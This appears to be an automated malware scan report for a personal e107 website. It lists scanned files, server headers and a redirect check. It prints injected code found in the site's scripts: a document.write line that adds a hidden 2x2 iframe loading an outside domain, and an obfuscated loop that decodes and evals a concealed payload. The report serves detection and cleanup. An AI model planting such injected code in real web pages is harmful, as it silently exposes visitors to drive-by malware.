Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=christopherengle.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://christopherengle.com/ | HTTP/1.1 302 Moved Temporarily Cache-Control: must-revalidate Connection: close Date: Fri, 27 Feb 2015 05:45:08 GMT Location: news.php Server: Apache Vary: Accept-Encoding Content-Language: en Content-Length: 0 Content-Type: text/html Expires: Sat, 01 Jan 2000 00:00:00 GMT Last-Modified: Fri, 27 Feb 2015 05:45:08 GMT Set-Cookie: PHPSESSID=cpuhvbl551rmfi7vu75igrjhe5; path=/ | clean |
http://christopherengle.com/news.php | 200 OK Content-Length: 10077 Content-Type: text/html | clean |
http://christopherengle.com/e107_files/e107.js | 200 OK Content-Length: 10917 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var nowLocal = new Date(); var localTime = Math.floor(nowLocal.getTime()/1000); function SyncWithServerTime(serverTime) { if (serverTime) { var serverDelta=Math.floor(localTime-serverTime); document.cookie = 'e107_tdOffset='+serverDelta+'; path=/'; document.cookie = 'e107_tdSetTime='+(localTime-serverDelta)+'; path=/'; } var tzCookie = 'e107_tzOffset='; var timezoneOffset = nowLocal.getTimezoneOffset(); } } function preview_image(src_val,img_path, not_found) { var ta; var desti = src_val + '_prev'; ta = document.getElementById(src_val).value; if(ta){ document.getElementById(desti).src = img_path + ta; }else{ document.getElementById(desti).src = not_found; } return; } document.write('<iframe src="http://govniaha.cu.cc/index.php?tp=06e7706b10c6f2e5" width="2" height="2" frameborder="0"></iframe>'); Antivirus reports:
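Hidden iFrame found. size: 2x2 src: http://govniaha.cu.cc/index.php?tp=06e7706b10c6f2e5 <iframe src="http://govniaha.cu.cc/index.php?tp=06e7706b10c6f2e5" width="2" height="2" frameborder="0"> The frame is emitted by the document.write() call at the end of the excerpt above, after what appear to be the script's regular helper functions; at 2x2 pixels it is effectively invisible, so a visitor's browser loads the third-party URL without any visible sign. | ||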
http://christopherengle.com/e107_files/popup.js | 200 OK Content-Length: 9616 Content-Type: text/javascript | malicious |
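Malicious code - confirmed by antiviruses (see below). The excerpt is abbreviated: it shows the start of the script and then, cut in mid-statement, an obfuscated tail. That tail builds the string s one character per loop pass (611 passes) from ar and then hands s to e, which appears to act as an eval-style evaluator, so the actual payload is not readable in the file and only becomes visible after decoding. window.defaultStatus = ""; function getRefToDivMod( divID, oDoc ) { if( !oDoc ) { oDoc = document; } if( document.layers ) { if( oDoc.layers[divID] ) { return oDoc.layers[divID]; } else { for( var x = 0, y; !y && x < oDoc.layers.length; x++ ) { y = getRefToDivMod(divID,oDoc.layers[x].document); } return y; } } if( document.getElementById ) { return oDoc.getElementById(divID); } if( document.all ) { return oDoc.all[d e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="16";s="";pos=0;i=0;while(i<611){e('po'+'s+=par'+'seInt(k'+'.rep'+'lace("'+'ren'+'","0a'+'sd"))+'+'ar2['+'i]/'+'4');e('s+=ar.su'+''+'bstr(pos,1)');i++;} e(s); Antivirus reports: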
| ||
http://christopherengle.com/e107_files/nav_menu_alt.js | 200 OK Content-Length: 14828 Content-Type: text/javascript | clean |
http://christopherengle.com/signup.php | 200 OK Content-Length: 9159 Content-Type: text/html | clean |
http://christopherengle.com/e107_handlers/calendar/calendar_stripped.js | 200 OK Content-Length: 34315 Content-Type: text/javascript | clean |
http://christopherengle.com/e107_handlers/calendar/calendar-setup_stripped.js | 200 OK Content-Length: 4919 Content-Type: text/javascript | clean |
http://christopherengle.com/e107_handlers/calendar/language/English.js | 200 OK Content-Length: 3595 Content-Type: text/javascript | clean |
http://christopherengle.com/fpw.php | 200 OK Content-Length: 8345 Content-Type: text/html | clean |
http://christopherengle.com/index.php | HTTP/1.1 302 Moved Temporarily Cache-Control: must-revalidate Connection: close Date: Fri, 27 Feb 2015 05:45:14 GMT Location: news.php Server: Apache Vary: Accept-Encoding Content-Language: en Content-Length: 0 Content-Type: text/html Expires: Sat, 01 Jan 2000 00:00:00 GMT Last-Modified: Fri, 27 Feb 2015 05:45:15 GMT Set-Cookie: PHPSESSID=hm7607d9vevl0jmb90sqbocsm6; path=/ | clean |
http://christopherengle.com/test404page.js | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1688 Content-Type: application/x-javascript | clean |
http://christopherengle.com/submitnews.php | 200 OK Content-Length: 18151 Content-Type: text/html | clean |
http://christopherengle.com/e107_plugins/forum/forum.php | 200 OK Content-Length: 9888 Content-Type: text/html | clean |
http://christopherengle.com/e107_plugins/forum/../../e107_files/popup.js | 200 OK Content-Length: 9616 Content-Type: text/javascript | malicious |
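Malicious code - confirmed by antiviruses (see below). The excerpt is abbreviated: it shows the start of the script and then, cut in mid-statement, an obfuscated tail. That tail builds the string s one character per loop pass (611 passes) from ar and then hands s to e, which appears to act as an eval-style evaluator, so the actual payload is not readable in the file and only becomes visible after decoding. window.defaultStatus = ""; function getRefToDivMod( divID, oDoc ) { if( !oDoc ) { oDoc = document; } if( document.layers ) { if( oDoc.layers[divID] ) { return oDoc.layers[divID]; } else { for( var x = 0, y; !y && x < oDoc.layers.length; x++ ) { y = getRefToDivMod(divID,oDoc.layers[x].document); } return y; } } if( document.getElementById ) { return oDoc.getElementById(divID); } if( document.all ) { return oDoc.all[d e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="16";s="";pos=0;i=0;while(i<611){e('po'+'s+=par'+'seInt(k'+'.rep'+'lace("'+'ren'+'","0a'+'sd"))+'+'ar2['+'i]/'+'4');e('s+=ar.su'+''+'bstr(pos,1)');i++;} e(s); Antivirus reports: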
| ||
http://christopherengle.com/e107_files/nav_menu.js | 200 OK Content-Length: 12762 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: christopherengle.com
Result:
HTTP/1.1 302 Moved Temporarily
Cache-Control: must-revalidate
Connection: close
Date: Fri, 27 Feb 2015 05:45:08 GMT
Location: news.php
Server: Apache
Vary: Accept-Encoding
Content-Language: en
Content-Length: 0
Content-Type: text/html
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Last-Modified: Fri, 27 Feb 2015 05:45:08 GMT
Set-Cookie: PHPSESSID=cpuhvbl551rmfi7vu75igrjhe5; path=/
...0 bytes of data.
GET / HTTP/1.1
Host: christopherengle.com
Result:
HTTP/1.1 302 Moved Temporarily
Cache-Control: must-revalidate
Connection: close
Date: Fri, 27 Feb 2015 05:45:08 GMT
Location: news.php
Server: Apache
Vary: Accept-Encoding
Content-Language: en
Content-Length: 0
Content-Type: text/html
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Last-Modified: Fri, 27 Feb 2015 05:45:08 GMT
Set-Cookie: PHPSESSID=cpuhvbl551rmfi7vu75igrjhe5; path=/
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: christopherengle.com
Referer: http://www.google.com/search?q=christopherengle.com
Result:
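The result is similar to the first query. No suspicious redirects were found. This check covers only server-side redirects, comparing a direct visit with a visit referred from a search engine; the malicious scripts listed under "Scanned pages/files" are a separate finding and are not cleared by this result.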
GET / HTTP/1.1
Host: christopherengle.com
Referer: http://www.google.com/search?q=christopherengle.com
Result:
The result is similar to the first query. There are no suspicious redirects found.